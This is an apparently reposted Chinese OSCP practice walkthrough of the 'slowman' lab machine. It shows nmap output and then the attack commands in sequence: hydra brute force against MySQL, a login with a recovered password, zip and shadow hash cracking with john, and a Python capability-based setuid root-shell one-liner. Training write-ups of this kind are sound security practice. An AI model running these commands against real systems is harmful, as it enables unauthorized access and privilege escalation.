OSCP 靶场
靶场介绍
|
slowman |
easy |
ftp利用、mysql爆破、mysql数据库使用、爆破zip 密码、shadow 爆破、利用Capabilities实现权限提权 |
信息收集
主机发现
端口扫描
└─# nmap -sV -A -p- -T4 192.168.31.119
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-11 00:55 EST
Nmap scan report for 192.168.31.119
Host is up (0.00083s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
20/tcp closed ftp-data
21/tcp open ftp vsftpd 3.0.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.31.181
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.5 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 02:d6:5e:01:45:5b:8d:2d:f9:cb:0b:df:45:67:04:22 (ECDSA)
|_ 256 f9:ce:4a:75:07:d0:05:1d:fb:a7:a7:69:39:1b:08:10 (ED25519)
80/tcp open http Apache httpd 2.4.52 ((Ubuntu))
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Fastgym
3306/tcp open mysql MySQL 8.0.35-0ubuntu0.22.04.1
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=MySQL_Server_8.0.35_Auto_Generated_Server_Certificate
| Not valid before: 2023-11-22T19:44:52
|_Not valid after: 2033-11-19T19:44:52
| mysql-info:
| Protocol: 10
| Version: 8.0.35-0ubuntu0.22.04.1
| Thread ID: 10
| Capabilities flags: 65535
| Some Capabilities: ODBCClient, Support41Auth, Speaks41ProtocolOld, DontAllowDatabaseTableColumn, IgnoreSpaceBeforeParenthesis, SupportsTransactions, Speaks41ProtocolNew, LongPassword, IgnoreSigpipes, FoundRows, SwitchToSSLAfterHandshake, LongColumnFlag, SupportsCompression, ConnectWithDatabase, InteractiveClient, SupportsLoadDataLocal, SupportsMultipleResults, SupportsAuthPlugins, SupportsMultipleStatments
| Status: Autocommit
| Salt: q"^<5|~[y8x19pbWx1Ex12kx01 x19
|_ Auth Plugin Name: caching_sha2_password
MAC Address: 08:00:27:A3:1C:A6 (Oracle VirtualBox virtual NIC)
Device type: general purpose|storage-misc|WAP|media device
Running (JUST GUESSING): Linux 5.X|4.X|2.6.X|3.X (98%), HP embedded (89%), Ubiquiti embedded (89%), Infomir embedded (88%)
OS CPE: cpe:/o:linux:linux_kernel:5 cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3 cpe:/h:hp:p2000_g3 cpe:/o:linux:linux_kernel:2.6.32 cpe:/h:ubnt:airmax_nanostation cpe:/h:infomir:mag-250
Aggressive OS guesses: Linux 5.0 - 5.4 (98%), Linux 4.15 - 5.8 (94%), Linux 5.0 - 5.5 (93%), Linux 5.1 (93%), Linux 2.6.32 - 3.13 (93%), Linux 2.6.39 (93%), Linux 2.6.22 - 2.6.36 (91%), Linux 3.10 - 4.11 (91%), Linux 5.0 (91%), Linux 3.10 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.83 ms 192.168.31.119
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 213.00 seconds
目录扫描
权限获取
这里ftp 可以匿名访问,获取allowwedusermysql.txt 文件后,爆破出账号密码
爆破mysql ,获取账号密码
hydra -l trainerjeff -P /usr/share/wordlists/rockyou.txt mysql://192.168.31.119 
mysql -h 192.168.31.119 -u trainerjeff -psoccer1 
进入数据库后,获取账号密码和访问路径
登录进去后获取一个压缩包,但是需要密码
爆破zip 密码
zip2john credentials.zip > credentialszip
john credentialszip --wordlist=/usr/share/wordlists/rockyou.txt 
解压后得到账号和密码
爆破hash 得到密码
john hash --wordlist=/usr/share/wordlists/rockyou.txt --format=crypt
权限提升
利用Capabilities实现权限提升,通过如下命令查看可以利用的程序
getcap / -r 2>/dev/null
原来参考:https://www.freebuf.com/articles/system/251182.html
我们通过python 提权到root 权限
python3.10 -c 'import os; os.setuid(0); os.system("/bin/sh")'
script /dev/null -c bash
End
“点赞、在看与分享都是莫大的支持”
原文始发于微信公众号(贝雷帽SEC):【OSCP】slowman
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论